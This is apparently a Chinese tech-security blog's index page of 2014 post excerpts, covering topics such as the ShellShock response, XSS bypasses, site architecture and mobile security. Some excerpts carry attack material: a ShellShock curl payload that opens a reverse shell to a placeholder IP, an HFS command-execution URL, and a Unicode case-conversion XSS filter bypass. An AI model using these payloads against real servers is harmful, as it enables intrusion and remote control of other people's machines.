admin的文章

11年前 (2014-10-04) 2663浏览 0评论

原文：http://bbs.pediy.com/showthread.php?p=1320731 摘要：2010年，智能手机真正成熟并普及起来；同时，这一年，也被认为是现代移动安全的元年。本文从技术和商业两个层面，回顾了移动平台安全这些年所走过的路。...

11年前 (2014-10-04) 2063浏览 0评论

1 地理空间距离计算面临的挑战 打开美团app，不管是筛选团购还是筛选商家，默认的排序项都是“离我最近”或者“智能排序”（如下图所示）。 不管是“离我最近”还是“智能排序”，都涉及到计算用户位置与各个团购单子或者商家的距离（注：在智能排序中距离作为一...

11年前 (2014-10-02) 1927浏览 0评论

前言 一个成熟的大型网站（如淘宝、京东等）的系统架构并不是开始设计就具备完整的高性能、高可用、安全等特性，它总是随着用户量的增加，业务功能的扩展 逐渐演变完善的，在这个过程中，开发模式、技术架构、设计思想也发生了很大的变化，就连技术人员也从几个人发...

11年前 (2014-09-29) 2241浏览 0评论

    优酷邮箱服务器允许源地址欺骗漏洞 邮箱服务器允许源地址欺骗漏洞。可任意伪造邮箱地址利用优酷的邮箱服务器来进行发信,造成信任源乱用。 邮箱服务器允许源地址欺骗漏洞。可任意伪造邮箱地址利用优酷的邮箱服务器来进行发信,造成信任源...

11年前 (2014-09-29) 2031浏览 0评论

Google Authenticator是谷歌推出的一款动态口令工具，旨在解决大家Google账户遭到恶意攻击的问题，在手机端生成动态口令后，在Google相关的服务登陆中除了用正常用户名和密码外，需要输入一次动态口令才能验证成功，此举是为了保护用...

11年前 (2014-09-29) 1822浏览 0评论

2014中国互联网安全大会第一天结束，安全牛君在会场整整转了一天，晚上回到家不敢偷懒赶紧写稿与大家分享，让种种原因未能参会的圈内人士有个概览。（先做个广告：您的转发就是对本文的支持，thanks!） 原定九点整开始的大会，晚开始了十几分钟，会场已是人...

11年前 (2014-09-29) 2228浏览 0评论

转自：http://www.aqniu.com/neotech/4515.html 前言 2014年9月12日，国内最大的漏洞报告平台wooyun.org在北京中关村皇冠假日酒店召开首届乌云峰会。安全牛作为峰会的合作媒体，全程参 与峰会，并采(dā...

11年前 (2014-09-29) 1609浏览 0评论

如果你正在阅读这篇文章，并且刚刚拿到你的第一份实习offer，那么恭喜你！你的辛勤工作、熬夜学习、专研技术等等努力通通没有白费。面试官非常欣赏你，你拿到了临时签约的offer。关于实习，我总结了一些经验分享给大家，希望能对各位有用。 1.头几天会很...

11年前 (2014-09-29) 3561浏览 0评论

本文PDF下载：破壳漏洞（ShellShock）应急概要 V3 密级 公开   破壳漏洞（ShellShock）应急概要  [第三版 2014/9/27 下午] 知道创宇安全研究团队 1.更新情况 版本 时间 描述 ...

11年前 (2014-09-29) 2526浏览 0评论

不管是用import还是用from mmmm import *的方式导入模块，当程序运行之后，回头在看那个存储着mmmm.py文件的目录中（关于mmmm.py文件可以看上一讲），多了一个文件: qw@qw-Latitude-E4300:~/Docum...

11年前 (2014-09-29) 4417浏览 0评论

一、命令执行漏洞分析 利用这个漏洞，需要两个条件： 服务器收到请求后，会执行bash 执行bash的时候，会将UserAgent等设置成环境变量 同时满足这两点的，一般是使用CGI的服务器，所以受到影响的服务器份额(我语文不好)不是很大。 对它进...

11年前 (2014-09-25) 6141浏览 0评论

ps:利用payload curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP...

11年前 (2014-09-24) 3018浏览 0评论

 最近一直忙于团建的工作，能够完全静下心来的时间也比较短，但团队的分享约定不能忘，同时也为了欢迎即将入队的一位新成员，在这里跟大家分享下Web2.0爬虫的一些技术点，希望对大家有些帮助，大家可以结合【这篇文章】一起来看，收获应该会更大，对其实Web2...

11年前 (2014-09-23) 3989浏览 0评论

转自：http://www.hackqing.com/index.asp?FoxNews=1268.html 这个程序在国内用的特别多，特别是那些抓肉鸡的黑阔。 http://localhost:80/?search=%00{.exec|cmd.} ...

11年前 (2014-09-23) 4961浏览 0评论

ps:在toUpperCase()函数中，字符ı会转变为I，字符ſ会变为S。在toLowerCase()函数中，字符İ会转变为i，字符K会转变为k。利用这些特性可以绕过xss的某些防御。 toUpperCase(): ı ==>I ſ ...

11年前 (2014-09-22) 2104浏览 0评论

昨天，U-EEE的网站收到了持续数分钟的DDOS攻击，在数据库、虚拟磁盘和Web 服务器、SSH服务器依次满载之后，攻击依然持续了数分钟，在所有漏洞尝试无果后，攻击者放弃了攻击，系统恢复了正常访问。     LogWatch发回的报告中显示，攻击针对...

11年前 (2014-09-22) 2379浏览 0评论

背景：2010年12月，Security Research Labs实验室的KarstenNohl和OsmocomBB项目程序员SylvainMunaut在Chaos Communication Congress黑客大会上展示了通过普通手机作为网络“...

11年前 (2014-09-19) 2573浏览 0评论

小编语 想必大家对于“移动互联网时代，平台决定未来”这类的词儿听多了。听多了很多人就想：我要不要做移动开发呢？做的话拜Android还是iOS呢？话说也 没有绝对的答案，目前看来两个平台各自欣欣向荣，自己喜欢哪个就做哪个吧！关键是要尽快开始学并且搞明...

11年前 (2014-09-18) 2666浏览 0评论

作者： 阮一峰 你可能知道，Javascript语言的执行环境是”单线程”（single thread）。 所谓”单线程”，就是指一次只能完成一件任务。如果有多个任务，就必须排队，前面一个任务完成，...

11年前 (2014-09-18) 4025浏览 0评论

转自：http://t.qq.com/p/t/330573116082464 当黑客入侵服务器后留下后门，若能及时发现后门可减少不必要的损失。这里以经典的Apache模块后门 mod_rootme 为例，分享下如何从进程行为来检测Linux后门的一些...